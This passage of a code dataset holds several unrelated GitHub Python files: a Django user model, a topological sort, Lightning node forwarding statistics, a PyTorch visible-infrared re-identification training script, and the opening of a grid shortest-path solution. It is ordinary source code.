models.CharField(max_length=250, null=True)\n username = models.CharField(max_length=250, unique=True, null=True)\n email = models.EmailField(max_length=250, unique=True)\n employee_id = models.CharField(max_length=250, unique=True, null=True, blank=True)\n is_active = models.BooleanField(default=True)\n is_staff = models.BooleanField(default=False)\n is_employee = models.BooleanField(default=False)\n is_superuser = models.BooleanField(default=False)\n timestamp = models.DateTimeField(auto_now=False, auto_now_add=True)\n\n objects = managers.UserManager()\n\n # This is necessary as the fields are switched\n USERNAME_FIELD = 'email'\n EMAIL_FIELD = 'username'\n EMPLOYEE_ID_FIELD = 'employee_id'\n\n class Meta:\n \"\"\"Meta definition for User.\"\"\"\n ordering = ['id']\n verbose_name = _(\"User\")\n verbose_name_plural = _(\"Users\")\n\n def __str__(self):\n \"\"\"String representation of User.\"\"\"\n try: \n return self.full_name()\n except Exception:\n return str(self.id)\n \n def full_name(self):\n if self.first_name and self.last_name and self.middle_name:\n return f\"{self.last_name} {self.first_name} {self.middle_name}\"\n elif self.first_name and self.last_name:\n return f\"{self.last_name} {self.first_name}\"\n else:\n return f\"{self.email}\"\n","repo_name":"folakeyz/techleft-client","sub_path":"backend/user/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18832865963","text":"'''\nsorts the directed acyclic graph(DAG) in topological order\n'''\nfrom AdjacencyList import *\nimport copy\n\nclass TopologicalSorting:\n def __init__(self):\n self.graph = AdjacencyList(True)\n self.graphPrepare()\n\n def graphPrepare(self):\n self.graph.addVertex(1)\n self.graph.addVertex(2)\n self.graph.addVertex(3)\n self.graph.addVertex(4)\n self.graph.addVertex(5)\n self.graph.addVertex(6)\n self.graph.addVertex(7)\n\n self.graph.addEdge(1,3)\n self.graph.addEdge(2,3)\n self.graph.addEdge(3,5)\n self.graph.addEdge(2,4)\n self.graph.addEdge(5,6)\n self.graph.addEdge(4,6)\n self.graph.addEdge(6,7)\n\n def initSorting(self):\n self.visited = {}\n self.reversedTopologicalArray = []\n self.topologicalArray = []\n self.allVertexes = self.graph.vertexs.keys()\n for key in self.allVertexes:\n try:\n self.visited[key]\n continue\n except:\n self.visited[key] = True\n self.dfs(key, 0)\n self.reversedTopologicalArray.append(key)\n self.topologicalArray = self.reversedTopologicalArray.copy()\n self.topologicalArray.reverse()\n\n def dfs(self, vertex, number=0):\n try:\n while True:\n value = self.graph.vertexs[vertex][number]\n try:\n self.visited[value]\n number = number + 1\n except:\n self.visited[value] = True\n self.dfs(value, 0)\n self.reversedTopologicalArray.append(value)\n break\n except:\n return None\n\nts = TopologicalSorting()\nts.initSorting()\nprint(\"reversedTopologicalArray: \", ts.reversedTopologicalArray)\nprint(\"topologicalArray: \", ts.topologicalArray)","repo_name":"shubhamsinghrathi/algorithms","sub_path":"graph/topologicalSorting.py","file_name":"topologicalSorting.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74108898713","text":"import datetime\n\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\n\nfrom lndmanage.lib.node import LndNode\n\n\ndef plot_forwardings(forwarding_events):\n \"\"\"\n Plots a time series of the forwarding amounts.\n\n :param forwarding_events:\n \"\"\"\n times = []\n amounts = []\n for f in forwarding_events:\n times.append(datetime.datetime.fromtimestamp(f['timestamp']))\n amounts.append(f['amt_in'])\n\n plt.xticks(rotation=45)\n plt.scatter(times, amounts, s=2)\n plt.yscale('log')\n plt.ylabel('Forwarding amount [sat]')\n plt.show()\n\n\ndef plot_fees(forwarding_events):\n \"\"\"\n Plots forwarding fees and effective fee rate in color code.\n\n :param forwarding_events:\n \"\"\"\n times = []\n amounts = []\n color = []\n for f in forwarding_events:\n times.append(datetime.datetime.fromtimestamp(f['timestamp']))\n amounts.append(f['fee_msat'])\n color.append(f['effective_fee'])\n plt.xticks(rotation=45)\n plt.scatter(times, amounts, c=color, norm=colors.LogNorm(vmin=1E-6, vmax=1E-3), s=2)\n plt.yscale('log')\n plt.ylabel('Fees [msat]')\n plt.ylim((0.5, 1E+6))\n plt.colorbar(label='effective feerate (base + rate)')\n plt.show()\n\n\ndef statistics_forwardings(forwarding_events):\n \"\"\"\n Calculates and prints some statistics of forwarding events.\n\n :param forwarding_events:\n \"\"\"\n total_amount = 0\n total_fees = 0\n transactions = 0\n fee_rate = 0\n channels_out = {}\n channels_in = {}\n\n for f in forwarding_events:\n if f['chan_id_in'] not in channels_in.keys():\n channels_in[f['chan_id_in']] = 0\n if f['chan_id_out'] not in channels_out.keys():\n channels_out[f['chan_id_out']] = 0\n\n channels_out[f['chan_id_out']] += f['amt_in']\n channels_in[f['chan_id_in']] += f['amt_in']\n\n total_amount += f['amt_in']\n total_fees += f['fee_msat']\n transactions += 1\n fee_rate += f['effective_fee']\n\n fee_rate /= transactions\n print(\"-------- Forwarding statistics --------\")\n print(\"Number of forwardings: {}\".format(transactions))\n print(\"Total forwardings [sat]: {}\".format(total_amount))\n print(\"Total fees earned [sat]: {:.3f}\".format(total_fees / 1000.))\n print(\"Average fee rate: {:.6f}\".format(fee_rate))\n\n print(\"-------- Popular channels --------\")\n print(\"Popular channels out:\")\n for w in sorted(channels_out, key=channels_out.get, reverse=True)[:10]:\n print(w, channels_out[w])\n print(\"Popular channels in:\")\n for w in sorted(channels_in, key=channels_in.get, reverse=True)[:10]:\n print(w, channels_in[w])\n\n\nif __name__ == '__main__':\n node = LndNode()\n forwardings = node.get_forwarding_events()\n\n # plot_forwardings(forwardings)\n # plot_fees(forwardings)\n statistics_forwardings(forwardings)\n","repo_name":"bitromortac/lndmanage","sub_path":"examples/example_fwding_summary.py","file_name":"example_fwding_summary.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":169,"dataset":"github-code","pt":"5"} +{"seq_id":"73164146393","text":"from __future__ import print_function\nimport argparse\nimport sys\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nimport torchvision\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nfrom data_loader import SYSUData, TestData\nfrom data_manager import *\nfrom eval_metrics import eval_sysu\nfrom model_bn import embed_net\nfrom utils import *\nimport copy\nfrom loss import OriTripletLoss, TripletLoss_WRT, TripletLoss_ADP, sce, shape_cpmt_cross_modal_ce\n# from tensorboardX import SummaryWriter\nfrom ChannelAug import ChannelAdap, ChannelAdapGray, ChannelRandomErasing\nimport pdb\nimport wandb\n\nparser = argparse.ArgumentParser(description='PyTorch Cross-Modality Training')\nparser.add_argument('--dataset', default='sysu', help='dataset name: regdb or sysu]')\nparser.add_argument('--lr', default=0.1 , type=float, help='learning rate, 0.00035 for adam')\nparser.add_argument('--optim', default='sgd', type=str, help='optimizer')\nparser.add_argument('--arch', default='resnet50', type=str,\n help='network baseline:resnet18 or resnet50')\nparser.add_argument('--resume', '-r', default='', type=str,\n help='resume from checkpoint')\nparser.add_argument('--test-only', action='store_true', help='test only')\nparser.add_argument('--model_path', default='save_model/', type=str,\n help='model save path')\nparser.add_argument('--save_epoch', default=20, type=int,\n metavar='s', help='save model every 10 epochs')\nparser.add_argument('--log_path', default='log/', type=str,\n help='log save path')\nparser.add_argument('--vis_log_path', default='log/vis_log/', type=str,\n help='log save path')\nparser.add_argument('--workers', default=8, type=int, metavar='N',\n help='number of data loading workers (default: 4)')\nparser.add_argument('--img_w', default=144, type=int,\n metavar='imgw', help='img width')\nparser.add_argument('--img_h', default=288, type=int,\n metavar='imgh', help='img height')\nparser.add_argument('--batch-size', default=8, type=int,\n metavar='B', help='training batch size')\nparser.add_argument('--test-batch', default=64, type=int,\n metavar='tb', help='testing batch size')\nparser.add_argument('--method', default='agw', type=str,\n metavar='m', help='method type: base or agw, adp')\nparser.add_argument('--margin', default=0.3, type=float,\n metavar='margin', help='triplet loss margin')\nparser.add_argument('--num_pos', default=4, type=int,\n help='num of pos per identity in each modality')\nparser.add_argument('--trial', default=1, type=int,\n metavar='t', help='trial (only for RegDB dataset)')\nparser.add_argument('--seed', default=3, type=int,\n metavar='t', help='random seed')\nparser.add_argument('--gpu', default='0', type=str,\n help='gpu device ids for CUDA_VISIBLE_DEVICES')\nparser.add_argument('--mode', default='all', type=str, help='all or indoor')\n\nparser.add_argument('--date', default='12.22', help='date of exp')\n\nparser.add_argument('--gradclip', default= 11, type=float,\n metavar='gradclip', help='gradient clip')\nparser.add_argument('--gpuversion', default= '3090', type=str, help='3090 or 4090')\npath_dict = {}\npath_dict['3090'] = ['/home/share/reid_dataset/SYSU-MM01/', '/home/share/fengjw/SYSU_MM01_SHAPE/']\npath_dict['4090'] = ['/home/jiawei/data/SYSU-MM01/', '/home/jiawei/data/SYSU_MM01_SHAPE/']\nargs = parser.parse_args()\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\nwandb.init(config=args, project='rgbir-reid2')\nargs.method = args.method + \"_gradclip\" + str(args.gradclip) + \"_seed\" + str(args.seed)\nwandb.run.name = args.method\n# set_seed(args.seed)\n\ndataset = args.dataset\nif dataset == 'sysu':\n log_path = args.log_path + 'sysu_log/'\n test_mode = [1, 2] # thermal to visible\n\n\ncheckpoint_path = args.model_path\n\nif not os.path.isdir(log_path):\n os.makedirs(log_path)\nif not os.path.isdir(checkpoint_path):\n os.makedirs(checkpoint_path)\nif not os.path.isdir(args.vis_log_path):\n os.makedirs(args.vis_log_path)\n\nsuffix = dataset\n# if args.method == 'adp':\n# suffix = suffix + '_{}_joint_co_nog_ch_nog_sq{}'.format(args.method, args.square)\n# else:\nsuffix = suffix + '_{}'.format(args.method)\n \nsuffix = suffix + '_p{}_n{}_lr_{}'.format( args.num_pos, args.batch_size, args.lr) \n\nif not args.optim == 'sgd':\n suffix = suffix + '_' + args.optim\n\n\nsys.stdout = Logger(log_path + args.date + '/' + suffix + '_os.txt')\n\nvis_log_dir = args.vis_log_path + args.date + '/' + suffix + '/'\n\nif not os.path.isdir(vis_log_dir):\n os.makedirs(vis_log_dir)\n# writer = SummaryWriter(vis_log_dir)\nprint(\"==========\\nArgs:{}\\n==========\".format(args))\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nbest_acc = 0 # best test accuracy\nbest_acc_ema = 0 # best test accuracy\nstart_epoch = 0\n\nprint('==> Loading data..')\n# Data loading code\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\ntransform_train_list = [\n transforms.ToPILImage(),\n transforms.Pad(10),\n transforms.RandomCrop((args.img_h, args.img_w)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize]\n \ntransform_test = transforms.Compose( [\n transforms.ToPILImage(),\n transforms.Resize((args.img_h, args.img_w)),\n transforms.ToTensor(),\n normalize])\n\n\ntransform_train = transforms.Compose( transform_train_list )\n\nend = time.time()\nif dataset == 'sysu':\n # training set\n trainset = SYSUData(data_dir=path_dict[args.gpuversion][0],data_dir1=path_dict[args.gpuversion][1])\n # generate the idx of each person identity\n color_pos, thermal_pos = GenIdx(trainset.train_color_label, trainset.train_thermal_label)\n\n # testing set\n query_img, query_label, query_cam = process_query_sysu(mode=args.mode,data_path_ori=path_dict[args.gpuversion][0])\n # gall_img, gall_label, gall_cam = process_gallery_sysu_all(mode=args.mode,data_path_ori=path_dict[args.gpuversion][0])\n gall_img, gall_label, gall_cam = process_gallery_sysu(mode=args.mode, trial=0, data_path_ori=path_dict[args.gpuversion][0]) \n\nset_seed(args.seed)\n\n\n\ngallset = TestData(gall_img, gall_label, gall_cam, transform=transform_test, img_size=(args.img_w, args.img_h))\nqueryset = TestData(query_img, query_label, query_cam, transform=transform_test, img_size=(args.img_w, args.img_h))\n\n# testing data loader\ngall_loader = data.DataLoader(gallset, batch_size=args.test_batch, shuffle=False, num_workers=args.workers)\nquery_loader = data.DataLoader(queryset, batch_size=args.test_batch, shuffle=False, num_workers=args.workers)\n\nn_class = len(np.unique(trainset.train_color_label))\nnquery = len(query_label)\nngall = len(gall_label)\n\nprint('Dataset {} statistics:'.format(dataset))\nprint(' ------------------------------')\nprint(' subset | # ids | # images')\nprint(' ------------------------------')\nprint(' visible | {:5d} | {:8d}'.format(n_class, len(trainset.train_color_label)))\nprint(' thermal | {:5d} | {:8d}'.format(n_class, len(trainset.train_thermal_label)))\nprint(' ------------------------------')\nprint(' query | {:5d} | {:8d}'.format(len(np.unique(query_label)), nquery))\nprint(' gallery | {:5d} | {:8d}'.format(len(np.unique(gall_label)), ngall))\nprint(' ------------------------------')\nprint('Data Loading Time:\\t {:.3f}'.format(time.time() - end))\n\nprint('==> Building model..', args.method)\n\nnet = embed_net(n_class, no_local= 'off', gm_pool = 'on', arch=args.arch)\nnet_ema = embed_net(n_class, no_local= 'off', gm_pool = 'on', arch=args.arch)\nprint('use model without nonlocal but gmpool')\n\nnet.to(device)\nnet_ema.to(device)\n# cudnn.benchmark = True\n\nif len(args.resume) > 0:\n model_path = checkpoint_path + args.resume\n if os.path.isfile(model_path):\n print('==> loading checkpoint {}'.format(args.resume))\n checkpoint = torch.load(model_path)\n start_epoch = checkpoint['epoch']\n net.load_state_dict(checkpoint['net'])\n print('==> loaded checkpoint {} (epoch {})'\n .format(args.resume, checkpoint['epoch']))\n else:\n print('==> no checkpoint found at {}'.format(args.resume))\n\n# define loss function\ncriterion_id = nn.CrossEntropyLoss()\nif 'agw' in args.method:\n criterion_tri = TripletLoss_WRT()\nelse:\n loader_batch = args.batch_size * args.num_pos\n criterion_tri= OriTripletLoss(batch_size=loader_batch, margin=args.margin)\ncriterion_id.to(device)\ncriterion_tri.to(device)\nif args.optim == 'sgd':\n ignored_params = list(map(id, net.classifier.parameters()))\n ignored_params += list(map(id, net.bottleneck.parameters()))\n ignored_params += list(map(id, net.bottleneck_ir.parameters()))\n ignored_params += list(map(id, net.classifier_ir.parameters())) \n if hasattr(net,'classifier_shape'):\n ignored_params += list(map(id, net.classifier_shape.parameters())) \n ignored_params += list(map(id, net.bottleneck_shape.parameters())) \n \n ignored_params += list(map(id, net.projs.parameters())) \n print('#####larger lr for shape#####')\n\n base_params = filter(lambda p: id(p) not in ignored_params, net.parameters())\n params = [{'params': base_params, 'lr': 0.1 * args.lr}, {'params': net.classifier.parameters(), 'lr': args.lr},]\n \n params.append({'params': net.bottleneck.parameters(), 'lr': args.lr})\n params.append({'params': net.bottleneck_shape.parameters(), 'lr': args.lr})\n params.append({'params': net.classifier_ir.parameters(), 'lr': args.lr})\n params.append({'params': net.classifier_shape.parameters(), 'lr': args.lr})\n params.append({'params': net.projs.parameters(), 'lr': args.lr})\n params.append({'params': net.bottleneck_ir.parameters(), 'lr': args.lr})\n\n # optimizer = optim.Adam(params, weight_decay=5e-4)\n optimizer = optim.SGD(params, weight_decay=5e-4, momentum=0.9, nesterov=True)\n\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n\n ema_w = 1000\n if epoch < 10:\n lr = args.lr * (epoch + 1) / 10\n elif epoch >= 10 and epoch < 20:\n lr = args.lr\n elif epoch >= 20 and epoch < 85:\n lr = args.lr * 0.1\n ema_w = 10000\n elif epoch < 120:\n lr = args.lr * 0.01\n ema_w = 100000\n optimizer.param_groups[0]['lr'] = 0.1*lr\n for i in range(len(optimizer.param_groups) - 1):\n optimizer.param_groups[i + 1]['lr'] = lr\n\n return lr, ema_w\n\n\ndef update_ema_variables(net, net_ema, alpha, global_step=None):\n with torch.no_grad():\n for ema_item, new_item in zip(net_ema.named_parameters(), net.named_parameters()):\n ema_key, ema_param = ema_item\n new_key, new_param = new_item\n if 'classifier' in ema_key or 'bottleneck' in ema_key or 'projs' in ema_key:\n alpha_now = alpha*2\n else:\n alpha_now = alpha\n mygrad = new_param.data - ema_param.data\n ema_param.data.add_(mygrad, alpha=alpha_now)\n\ndef rand_bbox(size, lam):\n W = size[2]\n H = size[3]\n cut_rat = np.sqrt(1. - lam)\n cut_w = int(W * cut_rat)\n cut_h = int(H * cut_rat)\n\n # uniform\n cx = np.random.randint(W)\n cy = np.random.randint(H)\n\n bbx1 = np.clip(cx - cut_w // 2, 0, W)\n bby1 = np.clip(cy - cut_h // 2, 0, H)\n bbx2 = np.clip(cx + cut_w // 2, 0, W)\n bby2 = np.clip(cy + cut_h // 2, 0, H)\n\n return bbx1, bby1, bbx2, bby2\n\ndef train(epoch):\n\n current_lr, ema_w = adjust_learning_rate(optimizer, epoch)\n print('current lr', current_lr)\n train_loss = AverageMeter()\n id_loss = AverageMeter()\n id_loss_shape = AverageMeter()\n id_loss_shape2 = AverageMeter()\n mutual_loss = AverageMeter()\n mutual_loss2 = AverageMeter()\n kl_loss = AverageMeter()\n data_time = AverageMeter()\n batch_time = AverageMeter()\n correct = 0\n total = 0\n\n # switch to train mode\n net.train()\n net_ema.train()\n end = time.time()\n for batch_idx, (inputs) in enumerate(trainloader):\n x1, x1_shape, x2, x2_shape, y1, y2 = inputs\n y = torch.cat((y1, y2), 0)\n x1, x1_shape, x2, x2_shape, y1, y2, y = x1.cuda(), x1_shape.cuda(), x2.cuda(), x2_shape.cuda(), y1.cuda(), y2.cuda(), y.cuda()\n \n data_time.update(time.time() - end)\n\n cutmix_prob = np.random.rand(1)\n if cutmix_prob < 0.2:\n # generate mixed sample\n x = torch.cat((x1, x2), 0)\n x_shape = torch.cat((x1_shape, x2_shape), 0)\n lam = np.random.beta(1, 1)\n bbx1, bby1, bbx2, bby2 = rand_bbox(x.size(), lam)\n\n rand_index = torch.randperm(y1.size()[0]).cuda()\n target_a = y\n target_b = torch.cat((y2[rand_index],y1[rand_index]), 0)\n x[:, :, bbx1:bbx2, bby1:bby2] = torch.cat((x2[rand_index, :, bbx1:bbx2, bby1:bby2],x1[rand_index, :, bbx1:bbx2, bby1:bby2]),0)\n x_shape[:, :, bbx1:bbx2, bby1:bby2] = torch.cat((x2_shape[rand_index, :, bbx1:bbx2, bby1:bby2],x1_shape[rand_index, :, bbx1:bbx2, bby1:bby2]),0)\n\n # adjust lambda to exactly match pixel ratio\n lam = 1 - ((bbx2 - bbx1) * (bby2 - bby1) / (x.size()[-1] * x.size()[-2]))\n # compute output\n outputs = net(x[:y1.shape[0]], x[y1.shape[0]:], x_shape[:y1.shape[0]], x_shape[y1.shape[0]:])\n with torch.no_grad():\n outputs_ema = net_ema(x[:y1.shape[0]], x[y1.shape[0]:], x_shape[:y1.shape[0]], x_shape[y1.shape[0]:])\n \n loss_id = criterion_id(outputs['rgbir']['logit'], target_a) * lam + criterion_id(outputs['rgbir']['logit'], target_b) * (1. - lam)\n loss_id2 = torch.tensor([0]).cuda()\n loss_id_shape = criterion_id(outputs['shape']['logit'], target_a) * lam + criterion_id(outputs['shape']['logit'], target_b) * (1. - lam)\n loss_tri = torch.tensor([0]).cuda() \n loss_kl_rgbir = sce(outputs['rgbir']['logit'][:x1.shape[0]],outputs['rgbir']['logit'][x1.shape[0]:])+sce(outputs['rgbir']['logit'][x1.shape[0]:],outputs['rgbir']['logit'][:x1.shape[0]])\n w1 = torch.tensor([1.]).cuda()\n loss_estimate = torch.tensor([0]).cuda()\n w2 = torch.tensor([1.]).cuda()\n loss_kl_rgbir2 = torch.tensor([0]).cuda()\n\n else:\n with torch.no_grad():\n outputs_ema = net_ema(x1, x2, x1_shape, x2_shape)\n outputs = net(x1, x2, x1_shape, x2_shape)\n\n # id loss\n # if epoch < 40:\n loss_id = criterion_id(outputs['rgbir']['logit'], y)\n loss_id2 = criterion_id(outputs['rgbir']['logit2'], y)\n loss_id_shape = criterion_id(outputs['shape']['logit'], y)\n\n # triplet loss\n loss_tri, batch_acc = criterion_tri(outputs['rgbir']['bef'], y)\n \n # cross modal distill\n loss_kl_rgbir = sce(outputs['rgbir']['logit'][:x1.shape[0]],outputs['rgbir']['logit'][x1.shape[0]:])+sce(outputs['rgbir']['logit'][x1.shape[0]:],outputs['rgbir']['logit'][:x1.shape[0]])\n # shape complementary\n loss_kl_rgbir2 = shape_cpmt_cross_modal_ce(x1, y1, outputs)\n\n # shape consistent \n loss_estimate = ((outputs['rgbir']['zp']-outputs_ema['shape']['zp'].detach()) ** 2).mean(1).mean() + sce(torch.mm(outputs['rgbir']['zp'], net.classifier_shape.weight.data.detach().t()), outputs_ema['shape']['logit'])\n \n\n ############## reweighting ###############\n compliment_grad = torch.autograd.grad(loss_id2+loss_kl_rgbir2, outputs['rgbir']['bef'], retain_graph=True)[0]\n consistent_grad = torch.autograd.grad(loss_estimate, outputs['rgbir']['bef'], retain_graph=True)[0]\n\n with torch.no_grad():\n compliment_grad_norm = (compliment_grad.norm(p=2,dim=-1)).mean()\n consistent_grad_norm = (consistent_grad.norm(p=2,dim=-1)).mean()\n w1 = consistent_grad_norm / (compliment_grad_norm+consistent_grad_norm) * 2\n w2 = compliment_grad_norm / (compliment_grad_norm+consistent_grad_norm) * 2 \n\n ############## orthogonalize loss ###############\n proj_inner = torch.mm(F.normalize(net.projs[0], 2, 0).t(), F.normalize(net.projs[0], 2, 0))\n eye_label = torch.eye(net.projs[0].shape[1],device=device)\n loss_ortho = (proj_inner - eye_label).abs().sum(1).mean()\n\n\n\n loss = loss_id + loss_tri + loss_id_shape + loss_kl_rgbir + w1*loss_estimate + w2*loss_id2 +w2*loss_kl_rgbir2 + loss_ortho\n\n if not check_loss(loss):\n import pdb\n pdb.set_trace()\n optimizer.zero_grad()\n loss.backward()\n torch.nn.utils.clip_grad_norm_(net.parameters(), args.gradclip)\n optimizer.step()\n \n\n update_ema_variables(net, net_ema, 1/ema_w)\n\n\n # update P\n train_loss.update(loss_id2.item(), 2 * x1.size(0))\n id_loss.update(loss_id.item(), 2 * x1.size(0))\n id_loss_shape.update(loss_id_shape.item(), 2 * x1.size(0))\n id_loss_shape2.update(w1.item(), 2 * x1.size(0))\n mutual_loss2.update(loss_kl_rgbir2.item(), 2 * x1.size(0))\n mutual_loss.update(loss_ortho.item(), 2 * x1.size(0))\n # kl_loss.update(loss_kl2.item()+loss_kl.item() , 2 * x1.size(0))\n kl_loss.update(loss_estimate.item(), 2 * x1.size(0))\n total += y.size(0)\n\n # measure elapsed time 100. * correct / total\n batch_time.update(time.time() - end)\n end = time.time()\n if batch_idx % 50 == 0:\n # import pdb\n # pdb.set_trace()\n print('Epoch:[{}][{}/{}]'\n 'L:{id_loss.val:.4f}({id_loss.avg:.4f}) '\n 'L2:{train_loss.val:.4f}({train_loss.avg:.4f}) '\n 'sL:{id_loss_shape.val:.4f}({id_loss_shape.avg:.4f}) '\n 'w1:{id_loss_shape2.val:.4f}({id_loss_shape2.avg:.4f}) '\n 'or:{mutual_loss.val:.4f}({mutual_loss.avg:.4f}) '\n 'ML2:{mutual_loss2.val:.4f}({mutual_loss2.avg:.4f}) '\n 'KL:{kl_loss.val:.4f}({kl_loss.avg:.4f}) '.format(\n epoch, batch_idx, len(trainloader),\n train_loss=train_loss, id_loss=id_loss, id_loss_shape=id_loss_shape, id_loss_shape2=id_loss_shape2, mutual_loss=mutual_loss, mutual_loss2=mutual_loss2, kl_loss=kl_loss))\n\n\ndef test(net):\n pool_dim = 2048\n def fliplr(img):\n '''flip horizontal'''\n inv_idx = torch.arange(img.size(3)-1,-1,-1,device=img.device).long() # N x C x H x W\n img_flip = img.index_select(3,inv_idx)\n return img_flip\n def extract_gall_feat(gall_loader):\n net.eval()\n print ('Extracting Gallery Feature...')\n start = time.time()\n ptr = 0\n ngall = len(gall_loader.dataset)\n gall_feat_pool = np.zeros((ngall, pool_dim))\n gall_feat_fc = np.zeros((ngall, pool_dim))\n with torch.no_grad():\n for batch_idx, (input, label, cam) in enumerate(gall_loader):\n batch_num = input.size(0)\n input = Variable(input.cuda())\n feat_pool, feat_fc = net(input, input, mode=test_mode[0])\n input2 = fliplr(input)\n feat_pool2, feat_fc2 = net(input2, input2, mode=test_mode[0])\n feat_pool = (feat_pool+feat_pool2)/2\n feat_fc = (feat_fc+feat_fc2)/2\n\n gall_feat_pool[ptr:ptr+batch_num,: ] = feat_pool.detach().cpu().numpy()\n gall_feat_fc[ptr:ptr+batch_num,: ] = feat_fc.detach().cpu().numpy()\n ptr = ptr + batch_num\n print('Extracting Time:\\t {:.3f}'.format(time.time()-start))\n return gall_feat_pool, gall_feat_fc\n \n def extract_query_feat(query_loader):\n net.eval()\n print ('Extracting Query Feature...')\n start = time.time()\n ptr = 0\n nquery = len(query_loader.dataset)\n query_feat_pool = np.zeros((nquery, pool_dim))\n query_feat_fc = np.zeros((nquery, pool_dim))\n with torch.no_grad():\n for batch_idx, (input, label, cam) in enumerate(query_loader):\n batch_num = input.size(0)\n input = Variable(input.cuda())\n feat_pool, feat_fc = net(input, input, mode=test_mode[1])\n input2 = fliplr(input)\n feat_pool2, feat_fc2 = net(input2, input2, mode=test_mode[1])\n feat_pool = (feat_pool+feat_pool2)/2\n feat_fc = (feat_fc+feat_fc2)/2\n query_feat_pool[ptr:ptr+batch_num,: ] = feat_pool.detach().cpu().numpy()\n query_feat_fc[ptr:ptr+batch_num,: ] = feat_fc.detach().cpu().numpy()\n ptr = ptr + batch_num \n print('Extracting Time:\\t {:.3f}'.format(time.time()-start))\n return query_feat_pool, query_feat_fc\n # switch to evaluation mode\n net.eval()\n query_feat_pool, query_feat_fc = extract_query_feat(query_loader)\n\n # gall_img, gall_label, gall_cam = process_gallery_sysu(mode=args.mode, trial=0)\n\n trial_gallset = TestData(gall_img, gall_label, gall_cam, transform=transform_test, img_size=(args.img_w, args.img_h))\n trial_gall_loader = data.DataLoader(trial_gallset, batch_size=args.test_batch, shuffle=False, num_workers=4)\n\n gall_feat_pool, gall_feat_fc = extract_gall_feat(trial_gall_loader)\n\n # pool5 feature\n distmat_pool = np.matmul(query_feat_pool, np.transpose(gall_feat_pool))\n cmc_pool, mAP_pool, mINP_pool = eval_sysu(-distmat_pool, query_label, gall_label, query_cam, gall_cam)\n\n # fc feature\n distmat = np.matmul(query_feat_fc, np.transpose(gall_feat_fc))\n cmc, mAP, mINP = eval_sysu(-distmat, query_label, gall_label, query_cam, gall_cam)\n all_cmc = cmc\n all_mAP = mAP\n all_mINP = mINP\n all_cmc_pool = cmc_pool\n all_mAP_pool = mAP_pool\n all_mINP_pool = mINP_pool\n return all_cmc, all_mAP \n\n\n\ndef seed_worker(worker_id):\n worker_seed = torch.initial_seed() % 2**32\n np.random.seed(worker_seed)\n random.seed(worker_seed)\n\n# training\nprint('==> Start Training...')\nfor epoch in range(start_epoch, 120 - start_epoch):\n\n print('==> Preparing Data Loader...')\n # identity sampler\n sampler = IdentitySampler(trainset.train_color_label, \\\n trainset.train_thermal_label, color_pos, thermal_pos, args.num_pos, args.batch_size,\n epoch)\n\n trainset.cIndex = sampler.index1 # color index\n trainset.tIndex = sampler.index2 # thermal index\n print(epoch)\n # print(trainset.cIndex)\n # print(trainset.tIndex)\n\n loader_batch = args.batch_size * args.num_pos\n\n trainloader = data.DataLoader(trainset, batch_size=loader_batch, \\\n sampler=sampler, num_workers=args.workers, drop_last=True)\n\n # training\n\n if epoch == 0:\n net_ema.load_state_dict(net.state_dict())\n print('init ema modal')\n\n\n train(epoch)\n\n print('Test Epoch: {}'.format(epoch))\n\n # testing\n cmc, mAP = test(net)\n wandb.log({'rank1': cmc[0],\n 'mAP': mAP,\n },step=epoch)\n cmc_ema, mAP_ema = test(net_ema)\n wandb.log({'rank1_ema': cmc_ema[0],\n 'mAP_ema': mAP_ema,\n },step=epoch)\n # save model\n if cmc[0] > best_acc: \n best_acc = cmc[0]\n best_epoch = epoch\n state = {\n 'net': net.state_dict(),\n 'cmc': cmc,\n 'mAP': mAP,\n 'epoch': epoch,\n }\n torch.save(state, checkpoint_path + suffix + '_best.t')\n if cmc_ema[0] > best_acc_ema: \n best_acc_ema = cmc_ema[0]\n best_epoch_ema = epoch\n state = {\n 'net': net_ema.state_dict(),\n 'cmc': cmc_ema,\n 'mAP': mAP_ema,\n 'epoch': epoch,\n }\n torch.save(state, checkpoint_path + suffix + '_ema_best.t')\n if epoch % 5 == 0:\n state = {\n 'net': net_ema.state_dict(),\n }\n torch.save(state, checkpoint_path + suffix + '_' + str(epoch) + '_.t')\n\n print('Rank-1: {:.2%} | Rank-5: {:.2%} | Rank-10: {:.2%}| Rank-20: {:.2%}| mAP: {:.2%}'.format(\n cmc[0], cmc[4], cmc[9], cmc[19], mAP))\n print('Best Epoch [{}]'.format(best_epoch))\n \n print('------------------ema eval------------------')\n print('Rank-1: {:.2%} | Rank-5: {:.2%} | Rank-10: {:.2%}| Rank-20: {:.2%}| mAP: {:.2%}'.format(\n cmc_ema[0], cmc_ema[4], cmc_ema[9], cmc_ema[19], mAP_ema))\n print('Best Epoch [{}]'.format(best_epoch_ema))\n","repo_name":"jiawei151/SGIEL_VIReID","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":24882,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"5"} +{"seq_id":"1252874188","text":"from collections import deque\nT = int(input())\nfor t in range(1, T+1):\n N = int(input())\n arr = [list(map(int, input())) for _ in range(N)]\n acc = [[21e8]*N for _ in range(N)]\n\n q = deque()\n q.append((0,0))\n acc[0][0] = 0\n dy = [-1, 1, 0, 0]\n dx = [0, 0, -1, 1]\n\n while q:\n y, x = q.popleft()\n for i in range(4):\n ny = y + dy[i]\n nx = x + dx[i]\n if 0 <= ny < N and 0 <= nx < N:\n if acc[y][x] + arr[ny][nx] < acc[ny][nx]:\n acc[ny][nx] = acc[y][x] + arr[ny][nx]\n q.append((ny, nx))\n\n print(f'{t}', 